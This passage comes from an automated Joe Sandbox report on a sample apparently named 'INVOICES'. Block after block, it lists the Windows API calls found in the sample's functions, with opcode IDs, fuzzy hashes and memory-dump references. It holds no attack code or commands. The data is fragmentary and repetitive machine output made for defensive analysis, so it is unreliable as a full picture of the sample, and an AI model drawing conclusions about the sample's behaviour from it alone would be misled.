                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: da3278d35ce023cef462a8c330789fcce85ddc5f64e10c186015d177539795b5
                                                                                                                                  • Instruction ID: 4283e48feee47fb74d882028aed234b8f24153fca1a6f216117523f283125e87
                                                                                                                                  • Opcode Fuzzy Hash: da3278d35ce023cef462a8c330789fcce85ddc5f64e10c186015d177539795b5
                                                                                                                                  • Instruction Fuzzy Hash: B941D03590124CBBD760EF2CCC49FE9BBB4EB09360F154265F926A72E1D738AE41CA51
                                                                                                                                  APIs
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0078673D
                                                                                                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 00786789
                                                                                                                                  • TranslateMessage.USER32(?), ref: 007867B2
                                                                                                                                  • DispatchMessageW.USER32(?), ref: 007867BC
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007867CB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2108273632-0
                                                                                                                                  • Opcode ID: c40af04e87c16c3d091fb3f8b3ca704197bcf7bfb2c77290660daebcb9d4e217
                                                                                                                                  • Instruction ID: 23d8238a0b17815c053de2a0fa72829718f2e0a9bd3f0ce2f946ae32a6ecc015
                                                                                                                                  • Opcode Fuzzy Hash: c40af04e87c16c3d091fb3f8b3ca704197bcf7bfb2c77290660daebcb9d4e217
                                                                                                                                  • Instruction Fuzzy Hash: FC31E370980606BFDB20AFB4CC48FB6BBECAB00718F148225E525C31A1E73DA485D7A4
                                                                                                                                  APIs
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00788CF2
                                                                                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00788D9C
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00788DA4
                                                                                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00788DB2
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00788DBA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3382505437-0
                                                                                                                                  • Opcode ID: 73afe6b1b6a968b9ccf0d75fa35d831d4e3ebce56873ce769d3300285841b568
                                                                                                                                  • Instruction ID: ad254e7b1daa386847c410342a7af20d17aac492493f58ffce5311aa59fec726
                                                                                                                                  • Opcode Fuzzy Hash: 73afe6b1b6a968b9ccf0d75fa35d831d4e3ebce56873ce769d3300285841b568
                                                                                                                                  • Instruction Fuzzy Hash: A231EE71A00219EBDF00DF68DD4CA9E3BB5EB18315F108229F924EA2D0C7B89D10CBA1
                                                                                                                                  APIs
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0078B4C6
                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0078B4E3
                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0078B51B
                                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0078B541
                                                                                                                                  • _wcsstr.LIBCMT ref: 0078B54B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3902887630-0
                                                                                                                                  • Opcode ID: 3da4d686cbc3e5ab3ff910eba8703e497f7bd209902ea6f551638fde5171cecd
                                                                                                                                  • Instruction ID: 2ec317bdf31dffbd4f4ae006c7245d8f3485f7ff8b2af741e0717a53f28f37e2
                                                                                                                                  • Opcode Fuzzy Hash: 3da4d686cbc3e5ab3ff910eba8703e497f7bd209902ea6f551638fde5171cecd
                                                                                                                                  • Instruction Fuzzy Hash: 6C212C31644244BAEB256B79DC09E7B7BA8DF49750F008139FC05CA1A1EFA9DC1093A0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 007BB1C6
                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007BB1EB
                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007BB203
                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 007BB22C
                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007A0FA5,00000000), ref: 007BB24A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2294984445-0
                                                                                                                                  • Opcode ID: fbad48ed3f7c713bcdcfc6ff4133b938e9b2085c638542b20b29de40f5011277
                                                                                                                                  • Instruction ID: 520d19051b5f609438baf498adccc7d618809a62dce9350e32df1dda58e030f1
                                                                                                                                  • Opcode Fuzzy Hash: fbad48ed3f7c713bcdcfc6ff4133b938e9b2085c638542b20b29de40f5011277
                                                                                                                                  • Instruction Fuzzy Hash: 38215E71514619AFCB209F38CC48BEA3BA4FB45721F108724FD26D61E0E7789811DB90
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007895E2
                                                                                                                                    • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00789614
                                                                                                                                  • __itow.LIBCMT ref: 0078962C
                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00789654
                                                                                                                                  • __itow.LIBCMT ref: 00789665
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$__itow$_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2983881199-0
                                                                                                                                  • Opcode ID: 78c7c998bf53f7337168b6bdd1ffc373a04a7d7c27ca54414702724b87f33dd0
                                                                                                                                  • Instruction ID: 44fbfb70870791f0906601b6d23bdddf4c6330c638fc3781a88fb229b2669df4
                                                                                                                                  • Opcode Fuzzy Hash: 78c7c998bf53f7337168b6bdd1ffc373a04a7d7c27ca54414702724b87f33dd0
                                                                                                                                  • Instruction Fuzzy Hash: 4921C871B40218FBEB20AA658C8DEFE7BA8DF59714F084065FE04E7251E6788D45C791
                                                                                                                                  APIs
                                                                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0073134D
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0073135C
                                                                                                                                  • BeginPath.GDI32(?), ref: 00731373
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0073139C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3225163088-0
                                                                                                                                  • Opcode ID: d6580eec8d631cd77d1e7162a430ee1ea2a878918e11a3f420b9d858387aa7b2
                                                                                                                                  • Instruction ID: ac5b644f7cb01c9a15bf2bdde42f8a80cc90d2b7a16e86c8d304cbd524e0a0f8
                                                                                                                                  • Opcode Fuzzy Hash: d6580eec8d631cd77d1e7162a430ee1ea2a878918e11a3f420b9d858387aa7b2
                                                                                                                                  • Instruction Fuzzy Hash: A4216D30800A08EFEB109F25EC04B797BA8FB007A1F548326F910965B2D77D9895DF98
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00794B61
                                                                                                                                  • __beginthreadex.LIBCMT ref: 00794B7F
                                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00794B94
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00794BAA
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00794BB1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3824534824-0
                                                                                                                                  • Opcode ID: e5603c23a032e3a0589e476787eefe4d7c353089c898701868d3d68d44be9352
                                                                                                                                  • Instruction ID: 4d36f15fbe6867da5bf0b151a31bec449c8a45e207d0c3818ef1c372937399c2
                                                                                                                                  • Opcode Fuzzy Hash: e5603c23a032e3a0589e476787eefe4d7c353089c898701868d3d68d44be9352
                                                                                                                                  • Instruction Fuzzy Hash: 481148B2904208BBCB108FACEC08FAA7FACAB48320F148365F914D3251D279C80087A0
                                                                                                                                  APIs
                                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00788546
                                                                                                                                  • GetLastError.KERNEL32(?,0078800A,?,?,?), ref: 00788550
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,0078800A,?,?,?), ref: 0078855F
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,0078800A), ref: 00788566
                                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0078857D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 883493501-0
                                                                                                                                  • Opcode ID: 6fc51e82a181cfce7101defdacd3c485727fcc5efa54aabc122612f2567eb048
                                                                                                                                  • Instruction ID: 7d82419d29be1b121bcd49ae129c0f1a4014aea26d80dec2330ec3a38952b2cd
                                                                                                                                  • Opcode Fuzzy Hash: 6fc51e82a181cfce7101defdacd3c485727fcc5efa54aabc122612f2567eb048
                                                                                                                                  • Instruction Fuzzy Hash: 39014FB1240208EFDB115FAADC48D6B7BACEF457557544629FC09C2120DA358D10CB61
                                                                                                                                  APIs
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00795307
                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00795315
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0079531D
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00795327
                                                                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00795363
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2833360925-0
                                                                                                                                  • Opcode ID: a93a73b7008b3a0f9503c5fd2f41f4093e222a174fce4c1b02e7f3026423ab4e
                                                                                                                                  • Instruction ID: 72d7d43d8f403536e5cabd06abd3dcef93662cc4d069b197992423caf63a0677
                                                                                                                                  • Opcode Fuzzy Hash: a93a73b7008b3a0f9503c5fd2f41f4093e222a174fce4c1b02e7f3026423ab4e
                                                                                                                                  • Instruction Fuzzy Hash: 04016D71C02A2DDBCF019FA9EC8DAEDBB78FB08711F05465AE841F2140DB78555087A5
                                                                                                                                  APIs
                                                                                                                                  • CLSIDFromProgID.COMBASE ref: 0078744F
                                                                                                                                  • ProgIDFromCLSID.COMBASE(?,00000000), ref: 0078746A
                                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0078736C,80070057,?,?), ref: 00787478
                                                                                                                                  • CoTaskMemFree.COMBASE(00000000), ref: 00787488
                                                                                                                                  • CLSIDFromString.COMBASE(?,?), ref: 00787494
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
• Opcode ID: b96576546373840e6fc57cc39790caa4a868b0e69d244b6b2ca4231a0796960d
• Instruction ID: 8d4bcb06ac8fe4d42184975642bc4474e3d3c65e65b622ba0c550a7eaa83a5ca
• Opcode Fuzzy Hash: b96576546373840e6fc57cc39790caa4a868b0e69d244b6b2ca4231a0796960d
• Instruction Fuzzy Hash: F0017172605204BBDB146F64DC44FAA7FADEB44B62F248124F909D3220D739DD40DBA0
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007883E8
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007883F2
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00788401
• RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00788408
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0078841E
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: HeapInformationToken$AllocateErrorLastProcess
• String ID:
• API String ID: 47921759-0
• Opcode ID: 9f3022fad60866f5459e2363d0935be75f25ac91c6ea98e9051c1dc4907cee98
• Instruction ID: d866e63c02a687fd488129139e2126d505ece48e11d001302a5b22d965235d2c
• Opcode Fuzzy Hash: 9f3022fad60866f5459e2363d0935be75f25ac91c6ea98e9051c1dc4907cee98
• Instruction Fuzzy Hash: B2F0AF71244209BFEB102FA8DC88F6B3BACEF89B54B404525F909C3160CB689C45DB61
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00788449
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00788453
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00788462
• RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00788469
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0078847F
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: HeapInformationToken$AllocateErrorLastProcess
• String ID:
• API String ID: 47921759-0
• Opcode ID: 9bc94537ddc681713f3bea44ef11ed2ff450f224db87728ce0b880159943a6eb
• Instruction ID: 04562499467c1c5c8677d8b672df833c63d7e39bb1bde89f9a91d5ed07ef946e
• Opcode Fuzzy Hash: 9bc94537ddc681713f3bea44ef11ed2ff450f224db87728ce0b880159943a6eb
• Instruction Fuzzy Hash: A6F0C271240309BFEB512FA8EC88F673FACEF49B54B444625F909C3160CB689C00DB61
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0078C4B9
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0078C4D0
• MessageBeep.USER32(00000000), ref: 0078C4E8
• KillTimer.USER32(?,0000040A), ref: 0078C504
• EndDialog.USER32(?,00000001), ref: 0078C51E
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: 16c36a0cece15856ce06f8c4c74fc6f44249a7b3b70a49c582d53ed9ffe4cdf0
• Instruction ID: 16f6d42760cf525c80df9447f2bf68e938dd640f92e0989d1e04356571234273
• Opcode Fuzzy Hash: 16c36a0cece15856ce06f8c4c74fc6f44249a7b3b70a49c582d53ed9ffe4cdf0
• Instruction Fuzzy Hash: 8B018B30540704A7EB316B24DD4EFA677B8FF00B09F004669F546E10E1DBF869548B54
APIs
• EndPath.GDI32(?), ref: 007313BF
• StrokeAndFillPath.GDI32(?,?,0076BA08,00000000,?), ref: 007313DB
• SelectObject.GDI32(?,00000000), ref: 007313EE
• DeleteObject.GDI32 ref: 00731401
• StrokePath.GDI32(?), ref: 0073141C
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: ed4ea2b2a9a28b58fe3f825de764b2b5d47671bbcaef527ad3b5e482381f92cf
• Instruction ID: 6f54fcab0126244945b0380c44814a99acdbf3362245b94f2f88f109e3094f5d
• Opcode Fuzzy Hash: ed4ea2b2a9a28b58fe3f825de764b2b5d47671bbcaef527ad3b5e482381f92cf
• Instruction Fuzzy Hash: 61F0FF31004B48EBEB116F2AEC4CB683FA4AB01766F58C325F529490F2C73D8995DF58
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00788C5F
• CloseHandle.KERNEL32(?), ref: 00788C74
• CloseHandle.KERNEL32(?), ref: 00788C7C
• GetProcessHeap.KERNEL32(00000000,?), ref: 00788C85
• HeapFree.KERNEL32(00000000), ref: 00788C8C
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessSingleWait
• String ID:
• API String ID: 3751786701-0
• Opcode ID: 40a93ff8716eda121a04bad0b3c2d068f2d2af65802fd1c4417342c17ab7a50b
• Instruction ID: c280ecd3fcea8e66ac0927720c95ca50bc5069dae0013c85245c4d2f8d5badce
• Opcode Fuzzy Hash: 40a93ff8716eda121a04bad0b3c2d068f2d2af65802fd1c4417342c17ab7a50b
• Instruction Fuzzy Hash: F5E05276104509FBDA011FE5EC0CE5ABFA9FB89B62B548731F219C1470CB3A9861DB58
APIs
  • Part of subcall function 00750F36: std::exception::exception.LIBCMT ref: 00750F6C
  • Part of subcall function 00750F36: __CxxThrowException@8.LIBCMT ref: 00750F81
  • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
  • Part of subcall function 00737BB1: _memmove.LIBCMT ref: 00737C0B
• __swprintf.LIBCMT ref: 0074302D
Strings
